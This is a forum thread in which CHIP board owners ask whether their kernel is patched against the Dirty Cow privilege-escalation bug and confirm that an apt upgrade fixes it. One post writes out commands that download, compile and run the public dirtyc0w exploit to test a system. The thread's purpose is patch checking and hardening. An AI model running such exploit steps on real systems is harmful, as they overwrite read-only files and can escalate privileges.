Dirty Cow patched yet?


I just installed the following packages on a CHIP when I ran an update, is this CHIP susceptible to the Dirty Cow bug or not?

chip-mali-modules-4.4.13-ntc-mlc chip-mconfigs linux-image-4.4.13-ntc-mlc rtl8723bs-mp-driver-modules-4.4.13-ntc-mlc


I just checked the dirty cow bug and it is not resolved in the newest OS. I will have to do the patch then.

chip@chip1:~$ cat /proc/version
Linux version 4.4.13-ntc-mlc (bamboo@ip-172-31-30-80) (gcc version 5.2.1 20151010 (Ubuntu 5.2.1-22ubuntu1) ) #1 SMP Thu Nov 3 01:28:54 UTC 2016
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
gcc -lpthread dirtyc0w.c -o dirtyc0w
sudo bash
echo this is not a test > foo
./dirtyc0w foo m00000000000000000
chip@chip1:~$cat foo


In reality you need to be connected has user on the chip for dirty cow. In my point of view I don’t thing it is a big issue for C.H.I.P. because if a hacker got user access on your C.H.I.P. he will use “sudo bash” instead. So change the default password!!! Very important!!!


Thanks. Yeah I change the root and user passwords as a matter of course only my NTC Chip’s and Raspberry Pi’s. Just a shame that nextthing co is putting out kernel updates that DON’T yet have an update for Dirty Cow.


If you do

sudo apt-get update
sudo apt-get upgrade

You will get the new kernel, which is the same version, but with the dirty cow patched.



What I could see this line appear before (Nov 3):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Thu Nov 3 01:28:54 UTC 2016 armv7l GNU/Linux

And now (Dec 6):
$ uname -a
Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux

[Solved] systemd-udevd high cpu load
How to check CHIP version?
CHIP crashes and switches off randomly, and every time after SCP to other devices

Yeah, I getting the same output since the 6th as well for uname -a

Linux chip 4.4.13-ntc-mlc #1 SMP Tue Dec 6 21:38:00 UTC 2016 armv7l GNU/Linux

Is this the one that is supposed to be patched for Dirty Cow?


Try your self:



you should have checked the post 4 days ago.

I did test it and it is patched!


Thanks, looks like I’m good as well. Didn’t know about the mentioned post from 4 days ago.